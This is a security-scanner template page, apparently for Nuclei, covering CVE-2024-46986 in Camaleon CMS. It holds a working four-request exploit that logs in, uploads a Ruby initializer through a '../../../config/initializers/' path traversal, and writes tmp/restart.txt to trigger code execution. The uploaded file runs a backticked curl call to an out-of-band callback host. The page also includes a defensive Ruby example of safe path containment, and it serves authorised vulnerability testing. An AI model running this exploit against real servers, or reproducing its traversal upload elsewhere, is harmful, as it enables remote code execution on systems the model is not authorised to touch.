Camaleon CMS < 2.8.1 Arbitrary File Write to RCE
ID: CVE-2024-46986
Severity: critical
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2024,camaleon,intrusive,rce,file-upload,authenticated
Description
An arbitrary file write vulnerability, reachable through the upload method of the MediaController, allows authenticated users to write files to any location on the web server Camaleon CMS is running on, limited only by the permissions of the underlying filesystem. It becomes remote code execution when the attacker can write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application, because Rails loads and executes every file in that directory at boot. The template below does exactly that: it logs in, uploads a .rb file with a `folder` value that traverses to config/initializers/, then writes tmp/restart.txt (the restart trigger that Phusion Passenger watches) so the new initializer is loaded, and waits for the out-of-band DNS callback.
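As an added example that is not part of the template or of Camaleon CMS's own code, the Ruby below models the bug class behind this CVE: a caller-controlled `folder` joined onto an upload root with no containment check, beside a hardened version that normalises the result and rejects anything that escapes the root. The Rails root, the upload directory layout (a per-site media folder three levels below the Rails root, which is the depth the template's ../../../ payloads assume) and the function names are assumptions for illustration.

```ruby
# Constructed example for illustration; this is not Camaleon CMS's own code.
# Assumed layout: uploads land in a per-site folder three levels below the
# Rails root, which is the depth the template's "../../../" payloads target.
RAILS_ROOT  = "/var/www/camaleon"
UPLOAD_ROOT = File.join(RAILS_ROOT, "public", "media", "1")

# Vulnerable pattern (CWE-22): the caller-controlled folder is joined straight
# onto the upload root, so "../" segments walk out of it and the file is
# written wherever the caller chooses.
def vulnerable_destination(folder, filename)
  File.expand_path(File.join(UPLOAD_ROOT, folder, filename))
end

# Hardened pattern: normalise the candidate path, then refuse anything that
# does not stay strictly inside the upload root. The filename is reduced to
# its basename so it cannot carry its own traversal or an absolute path.
def safe_destination(folder, filename)
  base = File.basename(filename)
  raise ArgumentError, "invalid filename" if base.empty? || base == "." || base == ".."

  candidate = File.expand_path(File.join(UPLOAD_ROOT, folder, base))
  root      = File.expand_path(UPLOAD_ROOT) + File::SEPARATOR
  unless candidate.start_with?(root)
    raise ArgumentError, "folder escapes upload root: #{folder.inspect}"
  end

  candidate
end

# Where the template's two "folder" values would land under the vulnerable join.
def template_payload_targets
  {
    initializer: vulnerable_destination("../../../config/initializers/", "payload.rb"),
    tmp_restart: vulnerable_destination("../../../tmp/", "restart.txt"),
  }
end

if __FILE__ == $PROGRAM_NAME
  template_payload_targets.each { |name, path| puts "#{name}: #{path}" }
  begin
    safe_destination("../../../config/initializers/", "payload.rb")
  rescue ArgumentError => e
    puts "rejected: #{e.message}"
  end
end
```

Under the vulnerable join the two `folder` values from the template resolve to config/initializers/ and tmp/ directly under the Rails root, which is why a file named restart.txt in tmp/ and a .rb file in config/initializers/ are enough for code execution on the next boot; the hardened version raises on both. The check is done on the fully expanded path rather than by stripping "../" from the input, so encoded or doubled traversal sequences are caught as well.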
YAML Source

```yaml
id: CVE-2024-46986

info:
  name: Camaleon CMS < 2.8.1 Arbitrary File Write to RCE
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application
  reference:
    - https://github.com/advisories/GHSA-wmjg-vqhv-q5p5
    - https://codeql.github.com/codeql-query-help/ruby/rb-path-injection
    - https://owasp.org/www-community/attacks/Path_Traversal
    - https://github.com/nomi-sec/PoC-in-GitHub
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2024-46986
    cwe-id: CWE-22,CWE-74
    epss-score: 0.0009
    epss-percentile: 0.39015
    cpe: cpe:2.3:a:tuzitio:camaleon_cms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    verified: true
    vendor: tuzitio
    product: camaleon_cms
    shodan-query: title:"Camaleon CMS"
    fofa-query: title="Camaleon CMS"
  tags: cve,cve2024,camaleon,intrusive,rce,file-upload,authenticated

variables:
  username: "{{username}}"
  password: "{{password}}"
  filename: "{{to_lower(rand_text_alpha(12))}}"

flow: http(1) && http(2) && http(3) && http(4)

http:
  - raw:
      - |
        GET /admin/login HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        internal: true
        name: nonce
        group: 1
        regex:
          - 'name="authenticity_token" value="(.*?)"'

  - raw:
      - |
        POST /admin/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Connection: keep-alive

        authenticity_token={{nonce}}&user%5Busername%5D={{username}}&user%5Bpassword%5D={{password}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(location,"/admin/dashboard")'
        internal: true

  - raw:
      - |
        POST /admin/media/upload?actions=false HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8

        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="file_upload"; filename="{{filename}}.rb"
        Content-Type: text/x-ruby-script

        `curl {{interactsh-url}}`
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="folder"

        ../../../config/initializers/
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="skip_auto_crop"

        true
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8--

    matchers:
      - type: word
        part: body
        words:
          - '{"name":"{{filename}}.rb","folder_path":"../../../config/initializers"'
        internal: true

  - raw:
      - |
        POST /admin/media/upload?actions=false HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8

        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="file_upload"; filename="restart.txt"
        Content-Type: text/x-ruby-script

        {{randstr}}
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="folder"

        ../../../tmp/
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8
        Content-Disposition: form-data; name="skip_auto_crop"

        true
        ------WebKitFormBoundarynJs8ffRP2MgQXiF8--

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns

      - type: word
        part: body
        words:
          - '{"name":"restart.txt","folder_path":"../../../tmp"'
# digest: 4b0a00483046022100acdf7dddfdc367abaf4c277e350409c4d3ce244507ab12b952e22b6c360b64d6022100bc00ec0288d977166768a15fdaf84dc53821f5311248e6254b9b85bc0dc66f11:922c64590222798bb761d5b6d8e72950
```

Guide to check the vulnerabilities
This template is run with Nuclei. It requires valid Camaleon CMS admin credentials, supplied through the `username` and `password` template variables, and sends four requests: the login page fetch, the login itself, the initializer upload and the tmp/restart.txt upload. It is tagged intrusive because the last two requests write files to the target's filesystem, and a positive result depends on the interactsh DNS callback, so run it only against systems you are authorised to test.

```bash
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-46986.yaml" -var username="ADMIN_USER" -var password="ADMIN_PASSWORD"
```